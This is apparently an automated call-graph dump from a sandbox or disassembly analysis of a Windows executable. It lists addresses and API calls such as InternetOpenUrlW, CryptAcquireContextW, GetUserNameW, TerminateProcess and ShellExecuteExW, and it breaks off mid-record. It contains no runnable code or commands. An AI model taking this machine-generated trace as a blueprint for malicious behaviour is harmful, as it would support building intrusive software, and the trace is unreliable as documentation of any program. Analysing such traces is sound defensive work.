39094->39095 39096 4821d1 39094->39096 39097 482095 6 API calls 39095->39097 39096->39089 39098 482109 39097->39098 39099 482115 _memset 39097->39099 39192 483260 39098->39192 39101 482125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 39099->39101 39102 4821aa GetLastError 39101->39102 39103 4821b2 39101->39103 39102->39096 39104 4821c0 WaitForSingleObject 39103->39104 39104->39096 39104->39104 39106 483121 39105->39106 39107 483133 39105->39107 39108 485c10 59 API calls 39106->39108 39110 485c10 59 API calls 39107->39110 39109 48312c 39108->39109 39109->39050 39111 483159 39110->39111 39111->39050 39112->39054 39113->39066 39232 48d3c0 39114->39232 39117 48c35b 39117->39066 39118 4bf23e 59 API calls 39119 48c37a 39118->39119 39119->39066 39242 48d340 39120->39242 39123 48c26b 39123->39066 39124 4bf23e 59 API calls 39125 48c28a 39124->39125 39125->39066 39127 48b8d6 39126->39127 39129 48b8e0 39126->39129 39128 484690 59 API calls 39127->39128 39128->39129 39130 48b916 39129->39130 39132 484690 59 API calls 39129->39132 39131 48b930 39130->39131 39133 484690 59 API calls 39130->39133 39134 48b94a 39131->39134 39135 484690 59 API calls 39131->39135 39132->39130 39133->39131 39136 48b964 39134->39136 39137 484690 59 API calls 39134->39137 39135->39134 39255 48bfd0 39136->39255 39137->39136 39139 48b976 39140 48bfd0 59 API calls 39139->39140 39141 48b988 39140->39141 39142 48bfd0 59 API calls 39141->39142 39143 48b99a 39142->39143 39144 48b9b4 39143->39144 39145 484690 59 API calls 39143->39145 39146 48b9f2 39144->39146 39267 483ff0 39144->39267 39145->39144 39146->39066 39148->39066 39150 481cf2 RegOpenKeyExW 39149->39150 39150->39071 39150->39089 39152 485c66 39151->39152 39157 485c1e 39151->39157 39153 485cff 39152->39153 39154 485c76 39152->39154 39208 4bf23e 39153->39208 39161 485c88 _signal 39154->39161 39199 486950 39154->39199 39157->39152 39162 485c45 39157->39162 39161->39075 39164 484690 59 API calls 39162->39164 39165 485c60 39164->39165 39165->39075 39167 484690 59 API calls 39166->39167 39168 483550 39167->39168 39168->39083 39170 4846a9 39169->39170 39171 48478c 39169->39171 39173 4846e9 39170->39173 39174 4846b6 39170->39174 39230 4bf26c 59 API calls 3 library calls 39171->39230 39175 4847a0 39173->39175 39176 4846f5 39173->39176 39177 484796 39174->39177 39178 4846c2 39174->39178 39180 4bf23e 59 API calls 39175->39180 39181 486950 59 API calls 39176->39181 39187 484707 _signal 39176->39187 39231 4bf26c 59 API calls 3 library calls 39177->39231 39229 483340 59 API calls _memmove 39178->39229 39182 4847aa 39180->39182 39181->39187 39184 4847bf 39182->39184 39189 4847cd 39182->39189 39185 485c10 59 API calls 39184->39185 39188 4847c8 39185->39188 39186 4846e0 39186->39089 39187->39089 39188->39089 39190 485c10 59 API calls 39189->39190 39191 4847ec 39190->39191 39191->39089 39193 48326f 39192->39193 39196 48327d 39192->39196 39194 485c10 59 API calls 39193->39194 39195 483278 39194->39195 39195->39099 39197 485c10 59 API calls 39196->39197 39198 48329c 39197->39198 39198->39099 39200 486986 39199->39200 39201 4869d3 39200->39201 39204 486a0d _signal 39200->39204 39213 493b4c 39200->39213 39201->39204 39223 4bf1bb 59 API calls 3 library calls 39201->39223 39204->39161 39227 4a0cfc 58 API calls std::exception::_Copy_str 39208->39227 39210 4bf256 39228 4a0eca RaiseException 39210->39228 39212 4bf26b 39216 493b54 39213->39216 39214 490c62 _malloc 58 API calls 39214->39216 39215 493b6e 39215->39201 39216->39214 39216->39215 39218 493b72 std::exception::exception 39216->39218 39224 49793d DecodePointer 39216->39224 39225 4a0eca RaiseException 39218->39225 39220 493b9c 39226 4a0d91 58 API calls _free 39220->39226 39222 493bae 39222->39201 39224->39216 39225->39220 39226->39222 39227->39210 39228->39212 39229->39186 39230->39177 39231->39175 39235 48ccc0 39232->39235 39236 493b4c 59 API calls 39235->39236 39237 48ccca 39236->39237 39240 48c347 39237->39240 39241 4bf1bb 59 API calls 3 library calls 39237->39241 39240->39117 39240->39118 39247 48cc50 39242->39247 39245 48c257 39245->39123 39245->39124 39248 493b4c 59 API calls 39247->39248 39249 48cc5d 39248->39249 39250 48cc64 39249->39250 39254 4bf1bb 59 API calls 3 library calls 39249->39254 39250->39245 39253 48d740 59 API calls 39250->39253 39253->39245 39256 48c001 39255->39256 39257 48c00a 39255->39257 39256->39257 39258 48c04c 39256->39258 39259 48c083 39256->39259 39257->39139 39294 48cf30 39258->39294 39261 48c09e 39259->39261 39263 48c0e1 39259->39263 39262 48cf30 59 API calls 39261->39262 39265 48c0b2 39262->39265 39302 48c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 39263->39302 39265->39257 39298 48d5b0 39265->39298 39268 484009 39267->39268 39269 4840f2 39267->39269 39271 48405d 39268->39271 39272 484016 39268->39272 39314 4bf26c 59 API calls 3 library calls 39269->39314 39273 484106 39271->39273 39274 484066 39271->39274 39275 4840fc 39272->39275 39276 484022 39272->39276 39280 4bf23e 59 API calls 39273->39280 39291 484078 _signal 39274->39291 39305 486760 39274->39305 39315 4bf26c 59 API calls 3 library calls 39275->39315 39278 48402b 39276->39278 39279 484044 39276->39279 39303 482e80 59 API calls _memmove 39278->39303 39304 482e80 59 API calls _memmove 39279->39304 39284 484110 39280->39284 39285 48413a 39284->39285 39286 48412c 39284->39286 39292 4856d0 59 API calls 39285->39292 39316 4856d0 39286->39316 39287 484054 39287->39146 39288 48403b 39288->39146 39290 484135 39290->39146 39291->39146 39293 484151 39292->39293 39293->39146 39295 48cf5b 39294->39295 39296 48cf41 39294->39296 39295->39257 39296->39295 39297 484690 59 API calls 39296->39297 39297->39296 39299 48d5e2 39298->39299 39300 48d63e 39299->39300 39301 484690 59 API calls 39299->39301 39300->39257 39301->39299 39302->39265 39303->39288 39304->39287 39308 486793 39305->39308 39306 486817 _signal 39306->39291 39307 4867dc 39307->39306 39335 4bf1bb 59 API calls 3 library calls 39307->39335 39308->39306 39308->39307 39309 493b4c 59 API calls 39308->39309 39309->39307 39314->39275 39315->39273 39317 485735 39316->39317 39323 4856de 39316->39323 39318 4857bc 39317->39318 39319 48573e 39317->39319 39321 4bf23e 59 API calls 39318->39321 39320 485750 _signal 39319->39320 39322 486760 59 API calls 39319->39322 39320->39290 39324 4857c6 39321->39324 39322->39320 39323->39317 39328 485704 39323->39328 39326 4857db 39324->39326 39336 4bf26c 59 API calls 3 library calls 39324->39336 39326->39290 39327 485806 39329 485709 39328->39329 39330 48571f 39328->39330 39331 483ff0 59 API calls 39329->39331 39332 483ff0 59 API calls 39330->39332 39333 485719 39331->39333 39334 48572f 39332->39334 39333->39290 39334->39290 39336->39327 39337 4c4c30 39339 490c62 58 API calls 39337->39339 39338 4c4c3a 39339->39338 39340 493f84 39341 493f90 ___BuildCatchObject 39340->39341 39377 4a2603 GetStartupInfoW 39341->39377 39343 493f95 39379 4978d5 GetProcessHeap 39343->39379 39345 493fed 39346 493ff8 39345->39346 39708 49411a 58 API calls 3 library calls 39345->39708 39380 495141 39346->39380 39349 493ffe 39350 494009 __RTC_Initialize 39349->39350 39709 49411a 58 API calls 3 library calls 39349->39709 39401 498754 39350->39401 39353 494018 39354 494024 GetCommandLineW 39353->39354 39710 49411a 58 API calls 3 library calls 39353->39710 39420 4a235f GetEnvironmentStringsW 39354->39420 39357 494023 39357->39354 39360 49403e 39361 494049 39360->39361 39711 497c2e 58 API calls 3 library calls 39360->39711 39430 4a21a1 39361->39430 39367 494062 39369 49406d __wwincmdln 39367->39369 39713 497c2e 58 API calls 3 library calls 39367->39713 39368 49405a 39444 497c68 39368->39444 39450 489f90 39369->39450 39372 494081 39373 494090 39372->39373 39705 497f3d 39372->39705 39714 497c59 58 API calls _doexit 39373->39714 39376 494095 ___BuildCatchObject 39378 4a2619 39377->39378 39378->39343 39379->39345 39715 497d6c 36 API calls 2 library calls 39380->39715 39382 495146 39716 498c48 InitializeCriticalSectionAndSpinCount __alloc_osfhnd 39382->39716 39384 49514b 39385 49514f 39384->39385 39718 4a24f7 TlsAlloc 39384->39718 39717 4951b7 61 API calls 2 library calls 39385->39717 39388 495154 39388->39349 39389 495161 39389->39385 39390 49516c 39389->39390 39391 498c96 __calloc_crt 58 API calls 39390->39391 39393 495179 39391->39393 39392 4951ae 39721 4951b7 61 API calls 2 library calls 39392->39721 39393->39392 39719 4a2553 TlsSetValue 39393->39719 39396 49518d 39396->39392 39398 495193 39396->39398 39397 4951b3 39397->39349 39720 49508e 58 API calls 4 library calls 39398->39720 39400 49519b GetCurrentThreadId 39400->39349 39402 498760 ___BuildCatchObject 39401->39402 39403 498af7 __lock 58 API calls 39402->39403 39404 498767 39403->39404 39405 498c96 __calloc_crt 58 API calls 39404->39405 39407 498778 39405->39407 39406 4987e3 GetStartupInfoW 39409 498927 39406->39409 39416 4987f8 39406->39416 39407->39406 39408 498783 ___BuildCatchObject @_EH4_CallFilterFunc@8 39407->39408 39408->39353 39410 4989ef 39409->39410 39413 498974 GetStdHandle 39409->39413 39415 498987 GetFileType 39409->39415 39723 4a263e InitializeCriticalSectionAndSpinCount 39409->39723 39724 4989ff LeaveCriticalSection _doexit 39410->39724 39412 498c96 __calloc_crt 58 API calls 39412->39416 39413->39409 39414 498846 39414->39409 39417 49887a GetFileType 39414->39417 39722 4a263e InitializeCriticalSectionAndSpinCount 39414->39722 39415->39409 39416->39409 39416->39412 39416->39414 39417->39414 39421 4a2370 39420->39421 39422 494034 39420->39422 39423 498cde __malloc_crt 58 API calls 39421->39423 39426 4a1f64 GetModuleFileNameW 39422->39426 39424 4a2396 _signal 39423->39424 39425 4a23ac FreeEnvironmentStringsW 39424->39425 39425->39422 39428 4a1f98 _wparse_cmdline 39426->39428 39427 4a1fd8 _wparse_cmdline 39427->39360 39428->39427 39429 498cde __malloc_crt 58 API calls 39428->39429 39429->39427 39431 4a21ba _fputws 39430->39431 39435 49404f 39430->39435 39432 498c96 __calloc_crt 58 API calls 39431->39432 39440 4a21e3 _fputws 39432->39440 39433 4a223a 39434 490bed _free 58 API calls 39433->39434 39434->39435 39435->39368 39712 497c2e 58 API calls 3 library calls 39435->39712 39436 498c96 __calloc_crt 58 API calls 39436->39440 39437 4a225f 39438 490bed _free 58 API calls 39437->39438 39438->39435 39440->39433 39440->39435 39440->39436 39440->39437 39441 4a2276 39440->39441 39725 49962f 58 API calls ___copy_to_char 39440->39725 39442 4942fd __NMSG_WRITE 8 API calls 39441->39442 39443 4a2282 39442->39443 39445 497c74 __IsNonwritableInCurrentImage 39444->39445 39726 4aaeb5 39445->39726 39447 497c92 __initterm_e 39449 497cb1 _doexit __IsNonwritableInCurrentImage 39447->39449 39729 4919ac 39447->39729 39449->39367 39451 489fa0 __ftell_nolock 39450->39451 39764 47cf10 39451->39764 39453 489fb0 39454 489fc4 GetCurrentProcess GetLastError SetPriorityClass 39453->39454 39455 489fb4 39453->39455 39457 489fe4 GetLastError 39454->39457 39458 489fe6 39454->39458 40136 4824e0 109 API calls _memset 39455->40136 39457->39458 39460 48d3c0 59 API calls 39458->39460 39459 489fb9 39459->39372 39461 48a00a 39460->39461 39462 48b669 39461->39462 39463 48a022 39461->39463 39464 4bf23e 59 API calls 39462->39464 39467 48d340 59 API calls 39463->39467 39465 48b673 39464->39465 39466 4bf23e 59 API calls 39465->39466 39468 48b67d 39466->39468 39469 48a04d 39467->39469 39469->39465 39470 48a065 39469->39470 39778 483a90 39470->39778 39474 48a159 GetCommandLineW CommandLineToArgvW lstrcpyW 39475 48a33d GlobalFree 39474->39475 39490 48a196 39474->39490 39476 48a45c 39475->39476 39477 48a354 39475->39477 39481 482220 76 API calls 39476->39481 39794 482220 39477->39794 39478 48a100 39478->39474 39479 490235 60 API calls _W_store_winword 39479->39490 39482 48a359 39481->39482 39484 48a466 39482->39484 39809 47ef50 39482->39809 39483 48a1cc lstrcmpW lstrcmpW 39483->39490 39484->39372 39486 48a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 39486->39490 39487 48a48f 39489 48a4ef 39487->39489 39814 483ea0 39487->39814 39492 481cd0 92 API calls 39489->39492 39490->39475 39490->39479 39490->39483 39490->39486 39491 48a361 39490->39491 40137 493c92 59 API calls ___get_qualified_locale_downlevel 39491->40137 39493 48a563 39492->39493 39497 484690 59 API calls 39493->39497 39528 48a5db 39493->39528 39495 48a36e lstrcpyW lstrcpyW 39496 48a395 OpenProcess 39495->39496 39498 48a3a9 WaitForSingleObject CloseHandle 39496->39498 39499 48a402 39496->39499 39501 48a5a9 39497->39501 39498->39499 39504 48a3cb 39498->39504 39502 481cd0 92 API calls 39499->39502 39500 48a6f9 40143 481a10 8 API calls 39500->40143 39507 484690 59 API calls 39501->39507 39508 48a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 39502->39508 39518 48a3e2 GlobalFree 39504->39518 39519 48a3d4 Sleep 39504->39519 40138 481ab0 PeekMessageW 39504->40138 39505 48a6fe 39509 48a70f 39505->39509 39510 48a8b6 CreateMutexA 39505->39510 39506 48a618 39506->39510 39512 48a624 GetVersion 39506->39512 39513 48a5d4 39507->39513 39514 48a451 39508->39514 39515 48a7d0 39509->39515 39523 47ef50 58 API calls 39509->39523 39516 48a8ca 39510->39516 39512->39500 39520 48a632 lstrcpyW lstrcatW lstrcatW 39512->39520 39835 47d240 CoInitialize 39513->39835 39514->39372 39521 47ef50 58 API calls 39515->39521 39517 47ef50 58 API calls 39516->39517 39531 48a8da 39517->39531 39524 48a3f7 39518->39524 39519->39496 39525 48a674 _memset 39520->39525 39526 48a7ec 39521->39526 39534 48a72f 39523->39534 39524->39372 39529 48a6b4 ShellExecuteExW 39525->39529 39527 48a7f1 lstrlenA 39526->39527 39530 490c62 _malloc 58 API calls 39527->39530 39528->39500 39528->39505 39528->39506 39529->39505 39533 48a6e3 39529->39533 39532 48a810 _memset 39530->39532 39535 483ea0 59 API calls 39531->39535 39547 48a92f 39531->39547 39537 48a81e MultiByteToWideChar lstrcatW 39532->39537 39676 48a9d1 39533->39676 39536 483ea0 59 API calls 39534->39536 39539 48a780 39534->39539 39535->39531 39536->39534 39537->39527 39538 48a847 lstrlenW 39537->39538 39540 48a8a0 CreateMutexA 39538->39540 39541 48a856 39538->39541 39542 48a79c CreateThread 39539->39542 39545 483ff0 59 API calls 39539->39545 39540->39516 39917 47e760 39541->39917 39542->39515 41385 48dbd0 39542->41385 39544 485c10 59 API calls 39548 48a98c 39544->39548 39545->39542 39546 48a860 CreateThread WaitForSingleObject 39546->39540 41316 48e690 39546->41316 39547->39544 39928 482840 39548->39928 39550 48a997 39933 480fc0 CryptAcquireContextW 39550->39933 39552 48a9ab 39553 48a9c2 lstrlenA 39552->39553 39554 48a9d8 39553->39554 39553->39676 39555 485c10 59 API calls 39554->39555 39556 48aa23 39555->39556 39557 482840 60 API calls 39556->39557 39558 48aa2e lstrcpyA 39557->39558 39560 48aa4b 39558->39560 39560->39560 39561 485c10 59 API calls 39560->39561 39562 48aa90 39561->39562 39563 47ef50 58 API calls 39562->39563 39564 48aaa0 39563->39564 39565 483ea0 59 API calls 39564->39565 39566 48aaf5 39564->39566 39565->39564 39567 483ff0 59 API calls 39566->39567 39568 48ab1d 39567->39568 39956 482900 39568->39956 39570 47ef50 58 API calls 39572 48abc5 39570->39572 39571 48ab28 _memmove 39571->39570 39573 483ea0 59 API calls 39572->39573 39574 48ac1e 39572->39574 39573->39572 39575 483ff0 59 API calls 39574->39575 39576 48ac46 39575->39576 39577 482900 60 API calls 39576->39577 39579 48ac51 _memmove 39577->39579 39578 47ef50 58 API calls 39580 48acee 39578->39580 39579->39578 39581 483ea0 59 API calls 39580->39581 39582 48ad43 39580->39582 39581->39580 39583 483ff0 59 API calls 39582->39583 39584 48ad6b 39583->39584 39585 482900 60 API calls 39584->39585 39588 48ad76 _memmove 39585->39588 39586 485c10 59 API calls 39587 48ae2a 39586->39587 39961 483580 39587->39961 39588->39586 39590 48ae3c 39591 485c10 59 API calls 39590->39591 39592 48ae76 39591->39592 39593 483580 59 API calls 39592->39593 39594 48ae82 39593->39594 39595 485c10 59 API calls 39594->39595 39596 48aebc 39595->39596 39597 483580 59 API calls 39596->39597 39598 48aec8 39597->39598 39599 485c10 59 API calls 39598->39599 39600 48af02 39599->39600 39601 483580 59 API calls 39600->39601 39602 48af0e 39601->39602 39603 485c10 59 API calls 39602->39603 39604 48af48 39603->39604 39605 483580 59 API calls 39604->39605 39606 48af54 39605->39606 39607 485c10 59 API calls 39606->39607 39608 48af8e 39607->39608 39609 483580 59 API calls 39608->39609 39610 48af9a 39609->39610 39611 485c10 59 API calls 39610->39611 39612 48afd4 39611->39612 39613 483580 59 API calls 39612->39613 39614 48afe0 39613->39614 39615 483100 59 API calls 39614->39615 39616 48b001 39615->39616 39617 483580 59 API calls 39616->39617 39618 48b025 39617->39618 39619 483100 59 API calls 39618->39619 39620 48b03c 39619->39620 39621 483580 59 API calls 39620->39621 39622 48b059 39621->39622 39623 483100 59 API calls 39622->39623 39624 48b070 39623->39624 39625 483580 59 API calls 39624->39625 39626 48b07c 39625->39626 39627 483100 59 API calls 39626->39627 39628 48b093 39627->39628 39629 483580 59 API calls 39628->39629 39630 48b09f 39629->39630 39631 483100 59 API calls 39630->39631 39632 48b0b6 39631->39632 39633 483580 59 API calls 39632->39633 39634 48b0c2 39633->39634 39635 483100 59 API calls 39634->39635 39636 48b0d9 39635->39636 39637 483580 59 API calls 39636->39637 39638 48b0e5 39637->39638 39639 483100 59 API calls 39638->39639 39640 48b0fc 39639->39640 39641 483580 59 API calls 39640->39641 39642 48b108 39641->39642 39644 48b130 39642->39644 40144 48cdd0 59 API calls 39642->40144 39645 47ef50 58 API calls 39644->39645 39646 48b16e 39645->39646 39648 48b1a5 GetUserNameW 39646->39648 39968 482de0 39646->39968 39649 48b1c9 39648->39649 39975 482c40 39649->39975 39651 48b1d8 39982 482bf0 39651->39982 39655 48b2f5 39993 4836c0 39655->39993 39661 482c40 59 API calls 39677 48b1f3 39661->39677 39664 482900 60 API calls 39664->39677 39666 483580 59 API calls 39666->39677 39670 483100 59 API calls 39670->39677 39676->39372 39677->39655 39677->39661 39677->39664 39677->39666 39677->39670 40145 47f1f0 59 API calls 39677->40145 41905 497e0e 39705->41905 39707 497f4c 39707->39373 39708->39346 39709->39350 39710->39357 39714->39376 39715->39382 39716->39384 39717->39388 39718->39389 39719->39396 39720->39400 39721->39397 39722->39414 39723->39409 39724->39408 39725->39440 39727 4aaeb8 EncodePointer 39726->39727 39727->39727 39728 4aaed2 39727->39728 39728->39447 39732 4918b0 39729->39732 39731 4919b7 39731->39449 39733 4918bc ___BuildCatchObject 39732->39733 39740 497dfc 39733->39740 39739 4918e3 ___BuildCatchObject 39739->39731 39741 498af7 __lock 58 API calls 39740->39741 39742 4918c5 39741->39742 39743 4918f4 DecodePointer DecodePointer 39742->39743 39744 491921 39743->39744 39745 4918d1 39743->39745 39744->39745 39757 49a78d 59 API calls ___copy_to_char 39744->39757 39754 4918ee 39745->39754 39747 491984 EncodePointer EncodePointer 39747->39745 39748 491933 39748->39747 39751 491958 39748->39751 39758 498d25 61 API calls __realloc_crt 39748->39758 39751->39745 39753 491972 EncodePointer 39751->39753 39759 498d25 61 API calls __realloc_crt 39751->39759 39752 49196c 39752->39745 39752->39753 39753->39747 39760 497e05 39754->39760 39757->39748 39758->39751 39759->39752 39763 498c81 LeaveCriticalSection 39760->39763 39762 4918f3 39762->39739 39763->39762 39765 47cf32 _memset __ftell_nolock 39764->39765 39766 47cf4f InternetOpenW 39765->39766 39767 485c10 59 API calls 39766->39767 39768 47cf8a InternetOpenUrlW 39767->39768 39769 47cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 39768->39769 39777 47cfb2 39768->39777 39770 4856d0 59 API calls 39769->39770 39771 47d000 39770->39771 39772 4856d0 59 API calls 39771->39772 39773 47d049 39772->39773 39773->39777 40146 483010 39773->40146 39775 47d084 39776 483010 59 API calls 39775->39776 39775->39777 39776->39777 39777->39453 39779 483ab2 39778->39779 39786 483ad0 GetModuleFileNameW PathRemoveFileSpecW 39778->39786 39780 483aba 39779->39780 39781 483b00 39779->39781 39783 493b4c 59 API calls 39780->39783 39782 4bf23e 59 API calls 39781->39782 39784 483ac7 39782->39784 39783->39784 39784->39786 40149 4bf1bb 59 API calls 3 library calls 39784->40149 39788 488400 39786->39788 39789 488437 39788->39789 39793 488446 39788->39793 39789->39793 40150 485d50 39789->40150 39790 4884b9 39790->39478 39793->39790 40160 488d50 59 API calls 39793->40160 39795 49f7c0 __ftell_nolock 39794->39795 39796 48222d 7 API calls 39795->39796 39797 48228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39796->39797 39798 4822bd K32EnumProcesses 39796->39798 39797->39798 39799 4822df 39798->39799 39800 4822d3 39798->39800 39801 482353 39799->39801 39802 4822f0 OpenProcess 39799->39802 39800->39482 39801->39482 39803 48230a K32EnumProcessModules 39802->39803 39804 482346 CloseHandle 39802->39804 39803->39804 39805 48231c K32GetModuleBaseNameW 39803->39805 39804->39801 39804->39802 40161 490235 39805->40161 39807 48233e 39807->39804 39808 482345 39807->39808 39808->39804 39810 490c62 _malloc 58 API calls 39809->39810 39813 47ef6e _memset 39810->39813 39811 47efdc 39811->39487 39812 490c62 _malloc 58 API calls 39812->39813 39813->39811 39813->39812 39813->39813 39815 483f05 39814->39815 39819 483eae 39814->39819 39816 483f18 39815->39816 39817 483fb1 39815->39817 39820 483fbb 39816->39820 39821 483f2d 39816->39821 39827 483f3d _signal 39816->39827 39818 4bf23e 59 API calls 39817->39818 39818->39820 39819->39815 39825 483ed4 39819->39825 39822 4bf23e 59 API calls 39820->39822 39823 486760 59 API calls 39821->39823 39821->39827 39824 483fc5 39822->39824 39823->39827 39826 483ff0 59 API calls 39824->39826 39828 483ed9 39825->39828 39829 483eef 39825->39829 39830 483fdf 39826->39830 39827->39487 40173 483da0 59 API calls _signal 39828->40173 40174 483da0 59 API calls _signal 39829->40174 39830->39487 39833 483ee9 39833->39487 39834 483eff 39834->39487 39836 47d27d CoInitializeSecurity 39835->39836 39839 47d276 39835->39839 39837 484690 59 API calls 39836->39837 39838 47d2b8 CoCreateInstance 39837->39838 39840 47d2e3 VariantInit VariantInit VariantInit VariantInit 39838->39840 39841 47da3c CoUninitialize 39838->39841 39839->39528 39842 47d38e VariantClear VariantClear VariantClear VariantClear 39840->39842 39841->39839 39843 47d3e2 39842->39843 39844 47d3cc CoUninitialize 39842->39844 40175 47b140 39843->40175 39844->39839 39847 47d3f6 40180 47b1d0 39847->40180 39849 47d422 39850 47d426 CoUninitialize 39849->39850 39851 47d43c 39849->39851 39850->39839 39852 47b140 60 API calls 39851->39852 39854 47d449 39852->39854 39855 47b1d0 SysFreeString 39854->39855 39856 47d471 39855->39856 39857 47d496 CoUninitialize 39856->39857 39858 47d4ac 39856->39858 39857->39839 39860 47d8cf 39858->39860 39861 47b140 60 API calls 39858->39861 39860->39841 39862 47d4d5 39861->39862 39863 47b1d0 SysFreeString 39862->39863 39864 47d4fd 39863->39864 39864->39860 39865 47b140 60 API calls 39864->39865 39866 47d5ae 39865->39866 39867 47b1d0 SysFreeString 39866->39867 39868 47d5d6 39867->39868 39868->39860 39869 47b140 60 API calls 39868->39869 39870 47d679 39869->39870 39871 47b1d0 SysFreeString 39870->39871 39872 47d6a1 39871->39872 39872->39860 39873 47b140 60 API calls 39872->39873 39874 47d6b6 39873->39874 39875 47b1d0 SysFreeString 39874->39875 39876 47d6de 39875->39876 39876->39860 39877 47b140 60 API calls 39876->39877 39878 47d707 39877->39878 39879 47b1d0 SysFreeString 39878->39879 39880 47d72f 39879->39880 39880->39860 39881 47b140 60 API calls 39880->39881 39882 47d744 39881->39882 39883 47b1d0 SysFreeString 39882->39883 39884 47d76c 39883->39884 39884->39860 40184 493aaf GetSystemTimeAsFileTime 39884->40184 39886 47d77d 40186 493551 39886->40186 39891 482c40 59 API calls 39892 47d7b5 39891->39892 39893 482900 60 API calls 39892->39893 39894 47d7c3 39893->39894 39895 47b140 60 API calls 39894->39895 39896 47d7db 39895->39896 39897 47b1d0 SysFreeString 39896->39897 39898 47d7ff 39897->39898 39898->39860 39899 47b140 60 API calls 39898->39899 39900 47d8a3 39899->39900 39901 47b1d0 SysFreeString 39900->39901 39902 47d8cb 39901->39902 39902->39860 39903 47b140 60 API calls 39902->39903 39904 47d8ea 39903->39904 39905 47b1d0 SysFreeString 39904->39905 39906 47d912 39905->39906 39906->39860 40194 47b400 SysAllocString 39906->40194 39908 47d936 VariantInit VariantInit 39909 47b140 60 API calls 39908->39909 39910 47d985 39909->39910 39911 47b1d0 SysFreeString 39910->39911 39912 47d9e7 VariantClear VariantClear VariantClear 39911->39912 39913 47da46 CoUninitialize 39912->39913 39914 47da10 39912->39914 39913->39839 40198 49052a 78 API calls swprintf 39914->40198 40345 47e670 39917->40345 39919 47e79e 39920 483ea0 59 API calls 39919->39920 39921 47e7c3 39920->39921 39922 483ff0 59 API calls 39921->39922 39923 47e7ff 39922->39923 40371 47e870 39923->40371 39925 47e806 39926 483ff0 59 API calls 39925->39926 39927 47e80d 39925->39927 39926->39927 39927->39546 40615 483c40 39928->40615 39930 48288c WideCharToMultiByte 40625 4884e0 39930->40625 39932 4828cf 39932->39550 39934 48101a 39933->39934 39935 48102b CryptCreateHash 39933->39935 40641 4a0eca RaiseException 39934->40641 39937 481045 39935->39937 39938 481056 lstrlenA CryptHashData 39935->39938 40642 4a0eca RaiseException 39937->40642 39940 48106e 39938->39940 39941 48107f CryptGetHashParam 39938->39941 40643 4a0eca RaiseException 39940->40643 39943 48109f 39941->39943 39945 4810b0 _memset 39941->39945 40644 4a0eca RaiseException 39943->40644 39946 4810cf CryptGetHashParam 39945->39946 39947 4810e4 39946->39947 39948 4810f5 39946->39948 40645 4a0eca RaiseException 39947->40645 39950 490c62 _malloc 58 API calls 39948->39950 39952 481105 _memset 39950->39952 39951 481148 39954 48114e CryptDestroyHash CryptReleaseContext 39951->39954 39952->39951 39953 4904a6 _sprintf 83 API calls 39952->39953 39955 481133 lstrcatA 39953->39955 39954->39552 39955->39951 39955->39952 39957 483a90 59 API calls 39956->39957 39958 48294c MultiByteToWideChar 39957->39958 39959 488400 59 API calls 39958->39959 39960 48298d 39959->39960 39960->39571 39962 483591 39961->39962 39963 4835d6 39961->39963 39962->39963 39964 483597 39962->39964 39965 484f70 59 API calls 39963->39965 39967 4835b7 39963->39967 39964->39967 40646 484f70 39964->40646 39965->39967 39967->39590 39969 482dfa 39968->39969 39970 482dec 39968->39970 39973 483ea0 59 API calls 39969->39973 39971 483ea0 59 API calls 39970->39971 39972 482df5 39971->39972 39972->39646 39974 482e11 39973->39974 39974->39646 39976 482c5f 39975->39976 39977 482c71 39975->39977 39978 4856d0 59 API calls 39976->39978 39980 4856d0 59 API calls 39977->39980 39979 482c6a 39978->39979 39979->39651 39981 482c8a 39980->39981 39981->39651 39983 483ff0 59 API calls 39982->39983 39984 482c13 39983->39984 39985 47ecb0 39984->39985 39986 47ece5 39985->39986 39988 47eefc 39986->39988 40668 491b3b 59 API calls 2 library calls 39986->40668 39988->39677 39989 4856d0 59 API calls 39991 47ed6b _memmove 39989->39991 39990 485230 59 API calls 39990->39991 39991->39988 39991->39989 39991->39990 40669 491b3b 59 API calls 2 library calls 39991->40669 39994 4836e7 39993->39994 39995 483742 39993->39995 39994->39995 39996 4836ed 39994->39996 39997 484f70 59 API calls 39995->39997 40000 48370d 39995->40000 39999 484f70 59 API calls 39996->39999 39996->40000 39997->40000 39998 48377f 40002 47ca70 39998->40002 39999->40000 40000->39998 40001 484690 59 API calls 40000->40001 40001->39998 40136->39459 40137->39495 40139 481ad0 40138->40139 40140 481af4 40138->40140 40141 481afc 40139->40141 40142 481adc DispatchMessageW PeekMessageW 40139->40142 40140->39504 40141->39504 40142->40139 40142->40140 40143->39505 40144->39644 40145->39677 40147 483ff0 59 API calls 40146->40147 40148 48303e 40147->40148 40148->39775 40151 485dfe 40150->40151 40152 485d66 40150->40152 40153 4bf23e 59 API calls 40151->40153 40154 486950 59 API calls 40152->40154 40159 485d84 _signal 40152->40159 40155 485e08 40153->40155 40156 485d76 40154->40156 40157 4bf23e 59 API calls 40155->40157 40156->39793 40158 485e1a 40157->40158 40158->39793 40159->39793 40160->39793 40162 490241 40161->40162 40163 4902b6 40161->40163 40165 495208 ___copy_to_char 58 API calls 40162->40165 40170 490266 40162->40170 40172 4902c8 60 API calls 3 library calls 40163->40172 40167 49024d 40165->40167 40166 4902c3 40166->39807 40171 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 40167->40171 40169 490258 40169->39807 40170->39807 40171->40169 40172->40166 40173->39833 40174->39834 40176 493b4c 59 API calls 40175->40176 40177 47b164 40176->40177 40178 47b177 SysAllocString 40177->40178 40179 47b194 40177->40179 40178->40179 40179->39847 40181 47b1de 40180->40181 40182 47b202 40180->40182 40181->40182 40183 47b1f5 SysFreeString 40181->40183 40182->39849 40183->40182 40185 493add __aulldiv 40184->40185 40185->39886 40199 4a035d 40186->40199 40188 49355a 40190 47d78f 40188->40190 40207 493576 40188->40207 40191 4928e0 40190->40191 40298 49279f 40191->40298 40195 47b423 40194->40195 40196 47b41d 40194->40196 40197 47b42d VariantClear 40195->40197 40196->39908 40197->39908 40198->39860 40200 49501f __getptd_noexit 58 API calls 40199->40200 40201 4a0363 40200->40201 40202 4a0369 40201->40202 40204 4a038d 40201->40204 40206 498cde __malloc_crt 58 API calls 40201->40206 40203 495208 ___copy_to_char 58 API calls 40202->40203 40202->40204 40205 4a036e 40203->40205 40204->40188 40205->40188 40206->40202 40208 4935a9 _memset 40207->40208 40209 493591 40207->40209 40208->40209 40213 4935c0 40208->40213 40210 495208 